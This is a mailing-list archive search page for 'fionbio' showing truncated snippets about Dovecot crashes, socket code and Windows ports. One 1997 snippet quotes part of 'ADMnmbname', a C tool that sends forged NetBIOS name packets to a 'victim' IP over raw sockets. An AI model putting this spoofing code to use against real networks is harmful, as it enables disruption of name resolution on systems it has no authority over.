search for: fionbio

Displaying 15 results from an estimated 15 matches for "fionbio".

2019 Jan 24
2
debian10+dovecot-2.2.33.2
...er: Error: service(auth): command startup failed, throttling for 2 secs Jan 24 16:02:07 postfix dovecot: auth: Fatal: master: service(auth): child 10443 killed with signal 11 (core dumped) Jan 24 16:02:07 postfix dovecot: director: Error: Auth server disconnected unexpectedly in strace: ioctl(3, FIONBIO, [1])????????????????? = 0 setsockopt(3, SOL_SOCKET, SO_OOBINLINE, [1], 4) = 0 select(4, [0 3], [], [3], {tv_sec=0, tv_usec=0}) = 0 (Timeout) select(4, [0 3], [], [3], NULL)???????? = 1 (in [3]) recvfrom(3, "* BYE Disconnected: Auth process"..., 8191, 0, NULL, NULL) = 41 select(4, [0 3],...
2019 Jan 24
0
debian10+dovecot-2.2.33.2
...uth server </div> <div> disconnected unexpectedly </div> <div> <br> </div> <div> <br> </div> <div> in strace: </div> <div> <br> </div> <div> ioctl(3, FIONBIO, [1]) = 0 </div> <div> setsockopt(3, SOL_SOCKET, SO_OOBINLINE, [1], 4) = 0 </div> <div> select(4, [0 3], [], [3], {tv_sec=0, tv_usec=0}) = 0 (Timeout) </div> <div> select(4, [0 3], [], [3], NULL) = 1 (in [3])...
2019 Jan 24
2
debian10+dovecot-2.2.33.2
...t; Jan 24 16:02:07 postfix dovecot: auth: Fatal: master: service(auth): >> child 10443 killed with signal 11 (core dumped) >> Jan 24 16:02:07 postfix dovecot: director: Error: Auth server >> disconnected unexpectedly >> >> >> in strace: >> >> ioctl(3, FIONBIO, [1])????????????????? = 0 >> setsockopt(3, SOL_SOCKET, SO_OOBINLINE, [1], 4) = 0 >> select(4, [0 3], [], [3], {tv_sec=0, tv_usec=0}) = 0 (Timeout) >> select(4, [0 3], [], [3], NULL)???????? = 1 (in [3]) >> recvfrom(3, "* BYE Disconnected: Auth process"..., 8191, 0...
2019 Jan 22
2
debian10+dovecot-2.2.33.2
Hi I have little problem with debian10 and dovecot 2.2.33.2 ps -ax 21815 ???????? S????? 0:00 dovecot/pop3-login director 21816 ???????? S????? 0:00 dovecot/pop3-login director 21817 ???????? S????? 0:00 dovecot/pop3-login director 21818 ???????? S????? 0:00 dovecot/pop3-login director 21819 ???????? S????? 0:00 dovecot/pop3-login director 21821 ???????? S????? 0:00 dovecot/pop3-login director
2019 Jan 24
2
debian10+dovecot-2.2.33.2
...>> >> child 10443 killed with signal 11 (core dumped) >> >> Jan 24 16:02:07 postfix dovecot: director: Error: Auth server >> >> disconnected unexpectedly >> >> >> >> >> >> in strace: >> >> >> >> ioctl(3, FIONBIO, [1])????????????????? = 0 >> >> setsockopt(3, SOL_SOCKET, SO_OOBINLINE, [1], 4) = 0 >> >> select(4, [0 3], [], [3], {tv_sec=0, tv_usec=0}) = 0 (Timeout) >> >> select(4, [0 3], [], [3], NULL)???????? = 1 (in [3]) >> >> recvfrom(3, "* BYE Disconne...
2019 Jan 24
0
debian10+dovecot-2.2.33.2
...d with signal 11 (core dumped) > >> >> Jan 24 16:02:07 postfix dovecot: director: Error: Auth server > >> >> disconnected unexpectedly > >> >> > >> >> > >> >> in strace: > >> >> > >> >> ioctl(3, FIONBIO, [1])????????????????? = 0 > >> >> setsockopt(3, SOL_SOCKET, SO_OOBINLINE, [1], 4) = 0 > >> >> select(4, [0 3], [], [3], {tv_sec=0, tv_usec=0}) = 0 (Timeout) > >> >> select(4, [0 3], [], [3], NULL)???????? = 1 (in [3]) > >> >> recvfrom(3,...
2014 Feb 13
3
Libguestfs (1.22.6) driver/changes for mingw/win32
Hi, I attached the changes I made to a vanilla libguestfs-1.22.6 in order to make it work in mingw/win32. Added is also the patch required to make QEMU compatible (add a command to QMP that lists the supported devices (the regilat way you do it print it to stderr, which is difficult to redirect in win32)). This is done on behalf of Intel Corp. Thanks, Or (oberon in irc)
2019 Jan 24
0
debian10+dovecot-2.2.33.2
...v> <div> >> disconnected unexpectedly </div> <div> >> </div> <div> >> </div> <div> >> in strace: </div> <div> >> </div> <div> >> ioctl(3, FIONBIO, [1]) = 0 </div> <div> >> setsockopt(3, SOL_SOCKET, SO_OOBINLINE, [1], 4) = 0 </div> <div> >> select(4, [0 3], [], [3], {tv_sec=0, tv_usec=0}) = 0 (Timeout) </div> <div> >> select(4, [0 3], [], [3],...
2008 Jun 06
0
[PATCH] stubdom: permit compilation without lwip
...return 0; @@ -555,6 +563,7 @@ va_end(ap); switch (cmd) { +#ifdef HAVE_LWIP case F_SETFL: if (files[fd].type == FTYPE_SOCKET && !(arg & ~O_NONBLOCK)) { /* Only flag supported: non-blocking mode */ @@ -562,6 +571,7 @@ return lwip_ioctl(files[fd].socket.fd, FIONBIO, &nblock); } /* Fallthrough */ +#endif default: printk("fcntl(%d, %d, %lx/%lo)\n", fd, cmd, arg, arg); errno = ENOSYS; @@ -666,9 +676,12 @@ /* Just poll without blocking */ static int select_poll(int nfds, fd_set *readfds, fd_set *writefds, fd_set *exceptfd...
2009 Dec 17
4
NIS failover
We just updated our configuratiosn to have multiple NIS servers, when we initiated a test of client failover, we were disapointed. It seemed that the only way to get a filaover was to /etc/init.d/ypbind restart. It behaves as indicated in http://bugs.opensolaris.org/bugdatabase/view_bug.do?bug_id=5084845 using ypbind-1.17.2-13 on Centos 4.5 / Linux xxxxxxxxxxxx 2.6.9-55.0.12.ELsmp #1 SMP Fri Nov
2004 Aug 06
0
Submission: Patch to libshout/sock.c for MacOSX
...(msb << 24); #endif return 1; } #endif /* _WIN32 */ int sock_set_blocking(SOCKET sockfd, const int block) { #ifdef _WIN32 int varblock = block; #endif if ((!sock_valid_socket(sockfd)) || (block < 0) || (block > 1)) return SOCKET_ERROR; #ifdef _WIN32 return ioctlsocket(sockfd, FIONBIO, &varblock); #else return fcntl(sockfd, F_SETFL, (block == SOCK_BLOCK) ? 0 : O_NONBLOCK); #endif } int sock_close(SOCKET sockfd) { #ifdef _WIN32 return closesocket(sockfd); #else return close(sockfd); #endif } /* * Write len bytes from buf to the socket. */ int sock_write_bytes(SOCKET s...
1997 Sep 26
3
Forwarded mail....
...r namezz[1024]; char name[64]="CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0"; char c; if(argc <2) { printf("usage: ADMnmbname <ip of the victim>\n"); exit (0); } socket_client=socket(AF_INET,SOCK_DGRAM,17); sr=socket(AF_INET,SOCK_RAW,17); ioctl(sr,FIONBIO,&i); sin_me.sin_family=AF_INET; sin_me.sin_addr.s_addr=htonl(INADDR_ANY); sin_me.sin_port=htons(2600); sin_dst.sin_family=AF_INET; sin_dst.sin_port=htons(137); sin_dst.sin_addr.s_addr = host2ip(argv[1]); nmb = (struct nmbhdr *) buffer; data = (char *)(buffer+NMBHDRSIZE); typz = (struct typ...
2006 Oct 13
0
Wine release 0.9.23
...user32: Return a fake device notification handle in RegisterDeviceNotificationA. Marcus Meissner (8): mswsock: More debug output in AcceptEx(). ntdll: Added debug registers test case. ntdll: Clear alignment check flag before entering exception handler. ws2_32: Implemented FIONBIO and FIONREAD in WSAIoctl. ntdll: More tests for exception handling. crypt32/tests: Replace bad use of sprintf by 2 strcats. crypt32: Include wine/port.h for strcasecmp. wine.inf: Add some more fake binaries. Markus Amsler (4): wined3d: Fix DEBUG_SINGLE_MODE. msv...
2020 Aug 18
15
[PATCH nbdkit 0/9] Port to Windows.
Also available here: https://github.com/rwmjones/nbdkit/tree/2020-windows-mingw This is the port to Windows using native Windows APIs (not MSYS or Cygwin). This patch series is at the point where it basically now works. I can run the server with the memory plugin, and access it remotely using guestfish, creating filesystems and so on without any apparent problems. Nevertheless there are many
2020 Aug 20
15
[PATCH nbdkit 0/13] Port to Windows without using a separate library.
Also available here: https://github.com/rwmjones/nbdkit/tree/2020-windows-mingw-nolib After a lot of work I have made the port to Windows work without using a separate library. Instead, on Windows only, we build an "import library" (library of stubs) which resolves references to nbdkit_* functions in the main program and fixes up the plugin, basically the first technique outlined in